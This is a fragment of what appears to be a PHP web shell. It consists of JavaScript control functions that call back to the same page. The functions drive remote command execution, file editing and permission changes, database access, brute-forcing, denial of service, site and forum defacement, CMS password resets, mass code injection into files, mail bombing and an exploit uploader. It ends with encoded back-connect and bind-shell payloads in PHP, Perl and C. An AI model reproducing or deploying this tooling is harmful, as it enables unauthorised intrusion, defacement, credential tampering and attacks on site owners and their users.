6521 ajaxRequest.onreadystatechange = function()
6522 {
6523 if(ajaxRequest.readyState == 4)
6524 {
6525 setpath(myfilepath);
6526 document.getElementById("crdir").innerHTML=myurl;
6527 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
6528 }
6529 }
6530
6531 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
6532 ajaxRequest.send(null);
6533}
6534function gethome(myaction,mydir)
6535{
6536 var myurl = urlchange(mydir);
6537 document.getElementById("showmaindata").innerHTML=waitstate;
6538 var ajaxRequest;
6539 ajaxRequest = new XMLHttpRequest();
6540
6541 ajaxRequest.onreadystatechange = function()
6542 {
6543 if(ajaxRequest.readyState == 4)
6544 {
6545 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
6546 setpath(mydir);
6547 document.getElementById("crdir").innerHTML=myurl;
6548 }
6549 }
6550
6551 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+mydir, true);
6552 ajaxRequest.send(null);
6553}
6554function getname(sitename)
6555{
6556 document.getElementById("showsite").innerHTML=waitstate;
6557 var ajaxRequest;
6558 ajaxRequest = new XMLHttpRequest();
6559
6560 ajaxRequest.onreadystatechange = function()
6561 {
6562 if(ajaxRequest.readyState == 4)
6563 {
6564 document.getElementById("showsite").innerHTML=ajaxRequest.responseText;
6565 }
6566 }
6567
6568 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?sitename="+sitename, true);
6569 ajaxRequest.send(null);
6570}
6571function myaction(myfileaction,chmode)
6572{
6573 var mytype = document.getElementsByName('actbox[]');
6574 var mychoice = new Array();
6575
6576 for (var i = 0, length = mytype.length; i < length; i++)
6577 {
6578 if (mytype[i].checked)
6579 mychoice[i] = mytype[i].value;
6580 }
6581
6582 var params = "choice="+myfileaction+"&chmode="+chmode+"&actbox[]="+mychoice;
6583
6584 document.getElementById("showmydata").className = "fixedbox";
6585 document.getElementById("showmydata").innerHTML=waitstate;
6586 var ajaxRequest;
6587 ajaxRequest = new XMLHttpRequest();
6588
6589 ajaxRequest.onreadystatechange = function()
6590 {
6591 if(ajaxRequest.readyState == 4)
6592 {
6593 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6594 }
6595 }
6596
6597 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6598 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6599 ajaxRequest.send(params);
6600}
6601function editdata()
6602{
6603 var result = "", // initialize list
6604 i,dbname,tablename;
6605 // iterate through arguments
6606 for (i = 1; i < arguments.length; i++)
6607 {
6608 if(i%2 == 0)
6609 result += arguments[i]+'=';
6610 else
6611 result += arguments[i]+'&';
6612 }
6613 result = result.slice(0, -1);
6614
6615 dbname = arguments[3];
6616 tablename = arguments[5];
6617 var result=result.replace(/dhanush_/g,"");
6618 var params = arguments[0]+"="+result;
6619
6620 document.getElementById("showsql").innerHTML=waitstate;
6621 var ajaxRequest;
6622 ajaxRequest = new XMLHttpRequest();
6623
6624 ajaxRequest.onreadystatechange = function()
6625 {
6626 if(ajaxRequest.readyState == 4)
6627 {
6628 viewtables('listTables',dbname,tablename);
6629 }
6630 }
6631
6632 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6633 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6634 ajaxRequest.send(params);
6635}
6636function viewtables(action,dbname,tablename,rowid,arrdata,executequery,fieldname,page)
6637{
6638 document.getElementById("showsql").innerHTML=waitstate;
6639 var ajaxRequest;
6640 ajaxRequest = new XMLHttpRequest();
6641
6642 ajaxRequest.onreadystatechange = function()
6643 {
6644 if(ajaxRequest.readyState == 4)
6645 {
6646 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
6647 }
6648 }
6649
6650 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?action="+action+"&dbname="+dbname+"&tablename="+tablename+"&"+rowid+"="+arrdata+"&executemyquery="+executequery+"&fieldname="+fieldname+"&page="+page, true);
6651 ajaxRequest.send(null);
6652}
6653function mydatabase(server,username,password)
6654{
6655 document.getElementById("showsql").innerHTML=waitstate;
6656 var ajaxRequest;
6657 ajaxRequest = new XMLHttpRequest();
6658
6659 ajaxRequest.onreadystatechange = function()
6660 {
6661 if(ajaxRequest.readyState == 4)
6662 {
6663 mydatago();
6664 }
6665 }
6666
6667 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executeit&server="+server+"&username="+username+"&password="+password, true);
6668 ajaxRequest.send(null);
6669}
6670function mydatago()
6671{
6672 var ajaxRequest;
6673 ajaxRequest = new XMLHttpRequest();
6674
6675 ajaxRequest.onreadystatechange = function()
6676 {
6677 if(ajaxRequest.readyState == 4)
6678 {
6679 document.getElementById("datatable").style.display = 'none';
6680 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
6681 }
6682 }
6683
6684 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydata", true);
6685 ajaxRequest.send(null);
6686}
6687function bruteforce(prototype,serverport,login,dict)
6688{
6689 var mytype = document.getElementsByName('mytype');
6690 for (var i = 0, length = mytype.length; i < length; i++)
6691 {
6692 if (mytype[i].checked)
6693 break;
6694 }
6695 var getreverse = 0;
6696 if(document.getElementById('reverse').checked == true)
6697 getreverse = 1;
6698 else
6699 getreverse = 0;
6700
6701 document.getElementById("showbrute").innerHTML=waitstate;
6702 var ajaxRequest;
6703 ajaxRequest = new XMLHttpRequest();
6704
6705 ajaxRequest.onreadystatechange = function()
6706 {
6707 if(ajaxRequest.readyState == 4)
6708 {
6709 document.getElementById("showbrute").innerHTML=ajaxRequest.responseText;
6710 }
6711 }
6712
6713 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?prototype="+prototype+"&serverport="+serverport+"&login="+login+"&dict="+dict+"&type="+mytype[i].value+"&reverse="+getreverse, true);
6714 ajaxRequest.send(null);
6715}
6716function executemyfile(action,executepath,execute)
6717{
6718 document.getElementById("showmydata").className = "fixedbox";
6719 document.getElementById("showmydata").innerHTML=waitstate;
6720 var ajaxRequest;
6721 ajaxRequest = new XMLHttpRequest();
6722
6723 ajaxRequest.onreadystatechange = function()
6724 {
6725 if(ajaxRequest.readyState == 4)
6726 {
6727 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6728 }
6729 }
6730
6731 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+action+"&executepath="+executepath+"&execute="+execute, true);
6732 ajaxRequest.send(null);
6733}
6734function maindata(myaction,dir)
6735{
6736 document.getElementById("showmaindata").innerHTML=waitstate;
6737 var ajaxRequest;
6738 ajaxRequest = new XMLHttpRequest();
6739
6740 ajaxRequest.onreadystatechange = function()
6741 {
6742 if(ajaxRequest.readyState == 4)
6743 {
6744 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
6745 document.getElementById("showdir").innerHTML="";
6746 }
6747 }
6748
6749 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+myaction+"&dir="+dir, true);
6750 ajaxRequest.send(null);
6751}
6752function manuallyscriptfn(sctype,passwd)
6753{
6754 var message = encodeURIComponent(passwd);
6755 var params = sctype+"="+sctype+"&passwd="+passwd;
6756 document.getElementById("showdata").innerHTML=waitstate;
6757 var ajaxRequest;
6758 ajaxRequest = new XMLHttpRequest();
6759
6760 ajaxRequest.onreadystatechange = function()
6761 {
6762 if(ajaxRequest.readyState == 3)
6763 {
6764 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
6765 }
6766 }
6767
6768 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6769 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6770 ajaxRequest.send(params);
6771}
6772function my404page(message)
6773{
6774 var message = encodeURIComponent(message);
6775 var params = "404page=404page&message="+message;
6776 document.getElementById("showdata").innerHTML=waitstate;
6777 var ajaxRequest;
6778 ajaxRequest = new XMLHttpRequest();
6779
6780 ajaxRequest.onreadystatechange = function()
6781 {
6782 if(ajaxRequest.readyState == 4)
6783 {
6784 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
6785 }
6786 }
6787
6788 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6789 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6790 ajaxRequest.send(params);
6791}
6792function executemyfn(executepath,executemycmd)
6793{
6794 var ajaxRequest,app;
6795 ajaxRequest = new XMLHttpRequest();
6796
6797 ajaxRequest.onreadystatechange = function()
6798 {
6799 if(ajaxRequest.readyState == 4)
6800 {
6801 app = "$ " + executemycmd + " : " + ajaxRequest.responseText + "\n";
6802 document.getElementById("showexecute").innerHTML=app+document.getElementById("showexecute").innerHTML;
6803 }
6804 }
6805
6806 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executepath="+executepath+"&executemycmd="+executemycmd, true);
6807 ajaxRequest.send(null);
6808}
6809function zoneh(defacer,hackmode,reason,domain)
6810{
6811 var domain = encodeURIComponent(domain);
6812 var params = "SendNowToZoneH=SendNowToZoneH&defacer="+defacer+"&hackmode="+hackmode+"&reason="+reason+"&domain="+domain;
6813 document.getElementById("showzone").innerHTML=waitstate;
6814 var ajaxRequest;
6815 ajaxRequest = new XMLHttpRequest();
6816
6817 ajaxRequest.onreadystatechange = function()
6818 {
6819 if(ajaxRequest.readyState == 4)
6820 {
6821 document.getElementById("showzone").innerHTML=ajaxRequest.responseText;
6822 }
6823 }
6824
6825 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6826 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6827 ajaxRequest.send(params);
6828}
6829function savemyfile(file,content)
6830{
6831 var content = encodeURIComponent(content);
6832 var params = "content="+content+"&file="+file;
6833 document.getElementById("showmydata").innerHTML=waitstate;
6834 document.getElementById("showdir").innerHTML="";
6835 var ajaxRequest;
6836 ajaxRequest = new XMLHttpRequest();
6837
6838 ajaxRequest.onreadystatechange = function()
6839 {
6840 if(ajaxRequest.readyState == 4)
6841 {
6842 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6843 }
6844 }
6845
6846 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6847 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6848 ajaxRequest.send(params);
6849}
6850function renamefun(file,to)
6851{
6852 document.getElementById("showmydata").innerHTML=waitstate;
6853 var ajaxRequest;
6854 ajaxRequest = new XMLHttpRequest();
6855
6856 ajaxRequest.onreadystatechange = function()
6857 {
6858 if(ajaxRequest.readyState == 4)
6859 {
6860 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6861 }
6862 }
6863
6864 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?renamemyfile&file="+file+"&to="+to, true);
6865 ajaxRequest.send(null);
6866}
6867function changeperms(chmode,myfilename)
6868{
6869 document.getElementById("showmydata").innerHTML=waitstate;
6870 var ajaxRequest;
6871 ajaxRequest = new XMLHttpRequest();
6872
6873 ajaxRequest.onreadystatechange = function()
6874 {
6875 if(ajaxRequest.readyState == 4)
6876 {
6877 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6878 }
6879 }
6880
6881 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?chmode="+chmode+"&myfilename="+myfilename, true);
6882 ajaxRequest.send(null);
6883}
6884function defacefun(deface)
6885{
6886 var ajaxRequest;
6887 ajaxRequest = new XMLHttpRequest();
6888
6889 ajaxRequest.onreadystatechange = function()
6890 {
6891 if(ajaxRequest.readyState == 4)
6892 {
6893 alert(ajaxRequest.responseText);
6894 }
6895 }
6896
6897 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?deface="+deface, true);
6898 ajaxRequest.send(null);
6899}
6900function cancel()
6901{
6902 document.getElementById("showmydata").className = "";
6903 document.getElementById("showmydata").innerHTML='';
6904}
6905function fileaction(myaction,myfilepath)
6906{
6907 document.getElementById("showmydata").className = "fixedbox";
6908 document.getElementById("showmydata").innerHTML=waitstate;
6909 var ajaxRequest;
6910 ajaxRequest = new XMLHttpRequest();
6911
6912 ajaxRequest.onreadystatechange = function()
6913 {
6914 if(ajaxRequest.readyState == 4)
6915 {
6916 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6917 }
6918 }
6919
6920 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
6921 ajaxRequest.send(null);
6922}
6923function bypassfun(funct,functvalue,optiontype)
6924{
6925 document.getElementById("showmydata").className = "fixedbox";
6926 document.getElementById("showmydata").innerHTML=waitstate;
6927 var ajaxRequest;
6928 ajaxRequest = new XMLHttpRequest();
6929 ajaxRequest.onreadystatechange = function()
6930 {
6931 if(ajaxRequest.readyState == 4)
6932 {
6933 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6934 }
6935 }
6936
6937 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?bypassit&"+funct+"="+functvalue+"&optiontype="+optiontype, true);
6938 ajaxRequest.send(null);
6939}
6940function dos(target,ip,port,timeout,exTime,no0fBytes,multiplier)
6941{
6942 document.getElementById("showdos").innerHTML=waitstate;
6943 var ajaxRequest;
6944 ajaxRequest = new XMLHttpRequest();
6945
6946 ajaxRequest.onreadystatechange = function()
6947 {
6948 if(ajaxRequest.readyState == 4)
6949 {
6950 document.getElementById("showdos").innerHTML=ajaxRequest.responseText;
6951 }
6952 }
6953
6954 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+target+"&ip="+ip+"&port="+port+"&timeout="+timeout+"&exTime="+exTime+"&multiplier="+multiplier+"&no0fBytes="+no0fBytes, true);
6955 ajaxRequest.send(null);
6956}
6957function createfile(filecreator,filecontent)
6958{
6959 var mm = filecreator.slice(0, filecreator.lastIndexOf("<?php echo addslashes($directorysperator); ?>"));
6960 var filecontent = encodeURIComponent(filecontent);
6961 var params = "filecontent="+filecontent+"&filecreator="+filecreator;
6962 document.getElementById("showdir").innerHTML=waitstate;
6963 var ajaxRequest;
6964 ajaxRequest = new XMLHttpRequest();
6965
6966 ajaxRequest.onreadystatechange = function()
6967 {
6968 if(ajaxRequest.readyState == 4)
6969 {
6970 gethome('home',mm);
6971 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
6972 document.getElementById("showmydata").innerHTML="";
6973 }
6974 }
6975
6976 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6977 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6978 ajaxRequest.send(params);
6979}
6980function createdir(create,createfolder)
6981{
6982 document.getElementById("showmydata").className = "fixedbox";
6983 document.getElementById("showmydata").innerHTML=waitstate;
6984 var ajaxRequest;
6985 ajaxRequest = new XMLHttpRequest();
6986
6987 ajaxRequest.onreadystatechange = function()
6988 {
6989 if(ajaxRequest.readyState == 4)
6990 {
6991 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6992 }
6993 }
6994
6995 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+create+"="+createfolder, true);
6996 ajaxRequest.send(null);
6997}
6998function codeinsert(code)
6999{
7000 var code = encodeURIComponent(code);
7001 var params = "getcode="+code;
7002 document.getElementById("showcode").innerHTML=waitstate;
7003 var ajaxRequest;
7004 ajaxRequest = new XMLHttpRequest();
7005
7006 ajaxRequest.onreadystatechange = function()
7007 {
7008 if(ajaxRequest.readyState == 4)
7009 {
7010 document.getElementById("showcode").innerHTML=ajaxRequest.responseText;
7011 }
7012 }
7013
7014 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7015 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7016 ajaxRequest.send(params);
7017}
7018function getmydefacedata(mydata)
7019{
7020 document.getElementById("showmydeface").innerHTML=waitstate;
7021 var ajaxRequest;
7022 ajaxRequest = new XMLHttpRequest();
7023
7024 ajaxRequest.onreadystatechange = function()
7025 {
7026 if(ajaxRequest.readyState == 4)
7027 {
7028 document.getElementById("showmydeface").innerHTML=ajaxRequest.responseText;
7029 }
7030 }
7031
7032 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
7033 ajaxRequest.send(null);
7034}
7035function getmydata(mydata)
7036{
7037 document.getElementById("showmydata").className = "fixedbox";
7038 document.getElementById("showmydata").innerHTML=waitstate;
7039 var ajaxRequest;
7040 ajaxRequest = new XMLHttpRequest();
7041
7042 ajaxRequest.onreadystatechange = function()
7043 {
7044 if(ajaxRequest.readyState == 4)
7045 {
7046 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
7047 }
7048 }
7049
7050 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
7051 ajaxRequest.send(null);
7052}
7053function getdata(mydata,myfile)
7054{
7055 document.getElementById("showdata").innerHTML=waitstate;
7056 var ajaxRequest;
7057 ajaxRequest = new XMLHttpRequest();
7058
7059 ajaxRequest.onreadystatechange = function()
7060 {
7061 if(ajaxRequest.readyState == 3)
7062 {
7063 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
7064 }
7065 }
7066
7067 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata+"&myfile="+myfile, true);
7068 ajaxRequest.send(null);
7069}
7070function getport(host,protocol,start,end)
7071{
7072 document.getElementById("showports").innerHTML=waitstate;
7073 var ajaxRequest;
7074 ajaxRequest = new XMLHttpRequest();
7075
7076 ajaxRequest.onreadystatechange = function()
7077 {
7078 if(ajaxRequest.readyState == 4)
7079 {
7080 document.getElementById("showports").innerHTML=ajaxRequest.responseText;
7081 }
7082 }
7083
7084 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?host=" + host + "&protocol=" + protocol, true);
7085 ajaxRequest.send(null);
7086}
7087function changeforumpassword(forumpass,f1,f2,f3,f4,forums,tableprefix,ipbuid,newipbpass,username,newjoomlapass,uname,newpass)
7088{
7089 document.getElementById("showchangepass").innerHTML=waitstate;
7090 var ajaxRequest;
7091 ajaxRequest = new XMLHttpRequest();
7092
7093 ajaxRequest.onreadystatechange = function()
7094 {
7095 if(ajaxRequest.readyState == 4)
7096 {
7097 document.getElementById("showchangepass").innerHTML=ajaxRequest.responseText;
7098 }
7099 }
7100
7101 ajaxRequest.open("GET", "<?php echo $_SERVER['PHP_SELF']; ?>?forumpass&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&forums=" + forums + "&prefix=" + tableprefix + "&ipbuid=" + ipbuid + "&newipbpass=" + newipbpass + "&username=" + username + "&newjoomlapass=" + newjoomlapass + "&uname=" + uname + "&newpass=" + newpass, true);
7102 ajaxRequest.send(null);
7103}
7104function forumdefacefn(index,f1,f2,f3,f4,defaceforum,tableprefix,siteurl,head,f5)
7105{
7106 var index = encodeURIComponent(index);
7107 var params = "forumdeface="+defaceforum+"&index=" + index + "&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&tableprefix="+tableprefix+"&siteurl="+siteurl+"&head="+head+"&f5="+f5;
7108 document.getElementById("showdeface").innerHTML=waitstate;
7109 var ajaxRequest;
7110 ajaxRequest = new XMLHttpRequest();
7111
7112 ajaxRequest.onreadystatechange = function()
7113 {
7114 if(ajaxRequest.readyState == 4)
7115 {
7116 document.getElementById("showdeface").innerHTML=ajaxRequest.responseText;
7117 }
7118 }
7119
7120 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7121 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7122 ajaxRequest.send(params);
7123}
7124function codeinjector(pathtomass,mode,filetype,injectthis)
7125{
7126 var injectthis = encodeURIComponent(injectthis);
7127 var params = "pathtomass="+pathtomass+"&mode=" + mode + "&filetype=" + filetype + "&injectthis=" + injectthis;
7128 document.getElementById("showinject").innerHTML=waitstate;
7129 var ajaxRequest;
7130 ajaxRequest = new XMLHttpRequest();
7131
7132 ajaxRequest.onreadystatechange = function()
7133 {
7134 if(ajaxRequest.readyState == 3)
7135 {
7136 document.getElementById("showinject").innerHTML=ajaxRequest.responseText;
7137 }
7138 }
7139
7140 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7141 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7142 ajaxRequest.send(params);
7143}
7144function sendmail(mailfunction,to,subject,message,from,times,padding)
7145{
7146 var message = encodeURIComponent(message);
7147 if(mailfunction == "massmailing")
7148 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"&from=" + from + "&message=" + message;
7149 else if(mailfunction == "dobombing")
7150 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"×=" + times + "&padding=" + padding + "&message=" + message;
7151 document.getElementById("showmail").innerHTML=waitstate;
7152 var ajaxRequest;
7153 ajaxRequest = new XMLHttpRequest();
7154
7155 ajaxRequest.onreadystatechange = function()
7156 {
7157 if(ajaxRequest.readyState == 4)
7158 {
7159 document.getElementById("showmail").innerHTML=ajaxRequest.responseText;
7160 }
7161 }
7162
7163 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7164 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7165 ajaxRequest.send(params);
7166}
7167function execode(code)
7168{
7169 var intext = document.getElementById('intext').checked;
7170 var message = encodeURIComponent(message);
7171 var params = "code="+code+"&intext="+intext;
7172 document.getElementById("showresult").innerHTML=waitstate;
7173 var ajaxRequest;
7174 ajaxRequest = new XMLHttpRequest();
7175
7176 ajaxRequest.onreadystatechange = function()
7177 {
7178 if(ajaxRequest.readyState == 4)
7179 {
7180 document.getElementById("showresult").innerHTML=ajaxRequest.responseText;
7181 }
7182 }
7183
7184 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7185 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7186 ajaxRequest.send(params);
7187}
7188function malwarefun(malwork)
7189{
7190 var malpath = document.getElementById('createfile').value;
7191 document.getElementById("showmal").innerHTML="<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
7192 var ajaxRequest;
7193 ajaxRequest = new XMLHttpRequest();
7194
7195 ajaxRequest.onreadystatechange = function()
7196 {
7197 if(ajaxRequest.readyState == 4)
7198 {
7199 document.getElementById("showmal").innerHTML=ajaxRequest.responseText;
7200 }
7201 }
7202
7203 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+malwork+"&path="+malpath, true);
7204 ajaxRequest.send(null);
7205}
7206function getexploit(wurl,path,functiontype)
7207{
7208 document.getElementById("showexp").innerHTML=waitstate;
7209 var ajaxRequest;
7210 ajaxRequest = new XMLHttpRequest();
7211
7212 ajaxRequest.onreadystatechange = function()
7213 {
7214 if(ajaxRequest.readyState == 4)
7215 {
7216 document.getElementById("showexp").innerHTML=ajaxRequest.responseText;
7217 }
7218 }
7219
7220 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?uploadurl&wurl="+wurl+"&functiontype="+functiontype+"&path="+path, true);
7221 ajaxRequest.send(null);
7222}
7223function showMsg(msg)
7224{
7225 if(msg == 'smf')
7226 {
7227 document.getElementById('tableprefix').value="smf_";
7228 document.getElementById('fid').style.display='block';
7229 document.getElementById('wpress').style.display='none';
7230 document.getElementById('joomla').style.display='none';
7231 }
7232 if(msg == 'mybb')
7233 {
7234 document.getElementById('tableprefix').value="mybb_";
7235 document.getElementById('wpress').style.display='none';
7236 document.getElementById('joomla').style.display='none';
7237 document.getElementById('fid').style.display='block';
7238 }
7239 if(msg == 'ipb' || msg == 'vb')
7240 {
7241 document.getElementById('tableprefix').value="";
7242 document.getElementById('wpress').style.display='none';
7243 document.getElementById('joomla').style.display='none';
7244 document.getElementById('fid').style.display='block';
7245 }
7246 if(msg == 'wp')
7247 {
7248 document.getElementById('tableprefix').value="wp_";
7249 document.getElementById('wpress').style.display='block';
7250 document.getElementById('fid').style.display='none';
7251 document.getElementById('joomla').style.display='none';
7252 }
7253 if(msg == 'joomla')
7254 {
7255 document.getElementById('joomla').style.display='block';
7256 document.getElementById('tableprefix').value="jos_";
7257 document.getElementById('wpress').style.display='none';
7258 document.getElementById('fid').style.display='none';
7259 }
7260}
7261function checkforum(msg)
7262{
7263 if(msg == 'smf')
7264 {
7265 document.getElementById('tableprefix').value="smf_";
7266 document.getElementById('smfipb').style.display='block';
7267 document.getElementById('myjoomla').style.display='none';
7268
7269 }
7270 if(msg == 'phpbb')
7271 {
7272 document.getElementById('tableprefix').value="phpb_";
7273 document.getElementById('myjoomla').style.display='none';
7274 document.getElementById('smfipb').style.display='block';
7275
7276 }
7277 if(msg == 'mybb')
7278 {
7279 document.getElementById('tableprefix').value="mybb_";
7280 document.getElementById('myjoomla').style.display='none';
7281 document.getElementById('smfipb').style.display='none';
7282 }
7283 if(msg == 'vb')
7284 {
7285 document.getElementById('tableprefix').value="";
7286 document.getElementById('myjoomla').style.display='none';
7287 document.getElementById('smfipb').style.display='none';
7288 }
7289 if(msg == 'ipb')
7290 {
7291 document.getElementById('myjoomla').style.display='none';
7292 document.getElementById('smfipb').style.display='block';
7293 document.getElementById('tableprefix').value="";
7294 }
7295 if(msg == 'wp')
7296 {
7297 document.getElementById('tableprefix').value="wp_";
7298 document.getElementById('myjoomla').style.display='block';
7299 document.getElementById('smfipb').style.display='none';
7300 document.getElementById('siteurl').value="http://site/blog";
7301 }
7302 if(msg == 'joomla')
7303 {
7304 document.getElementById('myjoomla').style.display='block';
7305 document.getElementById('tableprefix').value="jos_";
7306 document.getElementById('smfipb').style.display='none';
7307 document.getElementById('siteurl').value="http://site/administrator/";
7308 }
7309}
7310</script>
7311<body>
7312<?php
7313
7314$back_connect_p="eNqlU01PwzAMvVfqfwjlkkpd94HEAZTDGENCCJC2cRrT1DUZCWvjqk5A/fcs3Rgg1gk0XxLnPT/bsnN60rZYthdKt4vKSNC+53sqL6A0BCuMCEK6EiYi4O52UZSQCkTHkoCGMMeKk/Llbdqd+V4dx4jShu7ee7PQ0TdCMQrDxTKxmTEqF2ANPe/U+LtUmSDdC98ja0NYOe1tTH3Qrde/md8+DCfR1h0/Du7m48lo2L8Pd7FxClqL1FDqqoxcWeE3FIXmNGBH2LMOfum1mu1aJtqibCY4vcs/Cg6AC06uKtIvX63+j+CxHe+pkLFxhUbkSi+BsU3eDQsw5rboUcdermergYZR5xDYPQT2DoFnn8OQIsvc4uw2NU6TLKPTwOokF0EUtJJgFu5r4wlFSRT/2UOznuJfOo2k+l+hdGnVmv4Bmanx6Q==";
7315
7316$backconnect_perl="eNqlUl9rwjAQfxf8Drcqa4UWt1dLZU7rJmN2tNWXTUps45qtJiVNGf32S9pOcSAI3kNI7vcnd9z1boZlwYdbQoc55llZYFh4o1HA4m8s7G6n2+kXVSHwHmQ4oNfMLSpSXYL9if80dR7kuZYvpW110LzmJMPPiCYZVplup6hRI/CmL25owts8WizVRSWiIPTdyasJn1jknAm2rSjaY0MXca4PBtI/ZpTi+ChXbihJeESooSpZv99vTCAUiwgJ9pe72wykuv6+EVpjVAq2k62mRg2wHFMjCGeLpQna+LZhaSeQtwrNM5Dr+/+hnBMqQHOuiA+q2Qcj63zMUkRlI+cJlxhNWYITeKxgwr9KeonRda01Vs1aGRqOUwaW5ThBnSB0xxzHsmwo1fzBQjYoin3grQrMjyyS2KfwjHC5JYxXDZ7/tAQ4fpTiLFMoqHm1dbRrrhat53rzX0SL2FA=";
7317
7318$bind_port_c="bZJRT9swEIDfK/U/eEVa7WJK0mkPrMukaoCEpnUT8DKVKjK2Q05LbMt2KGzw3+ekKQ0Zfkn83efL3TkHoHhRCYk+Oy9AT/Mvw8FBh1lQdz1YKQhuDyrpxe1/p0UBWwjKo5KBwvULs3ecIp4ziyaTsLkn6O9wgMKqo45yCvPtvnHM6kO0bkEoqOLB0fw3E8KmoJBtQ4LJUisc04jsZJQ0pvR4cZ5eLM+u6dWPr9/Sq+vLs8X3vQcZfucIstJXVqGjuMV26kClGSuheAyZ2hSvgkZbH0K518ph5jXgup1VvCbklVfXOnXNo9ULfLFcnJ5epovlr517C0pgRxHudYkm5L2lKHqIX0ouwhVIVcsfd2iTQyFx/DLLZn4J41waH8Ro328zrcrMMH+TxW+wWZdtLHgZ4Ognc26jrfg0oiddwUomQtxQB3+kzrAh3WimLYYkmkP9exWhC0PmcHhI9kZ7KQibFaxRkqDxjRoT9PTUJTaQ3pl6bYUQj8adb0LWTJWXZntDszU1pM4T9VK4xzDYEo+Ow2UcuxwdwahbOy+0C63v0PNw8PwP";
7319
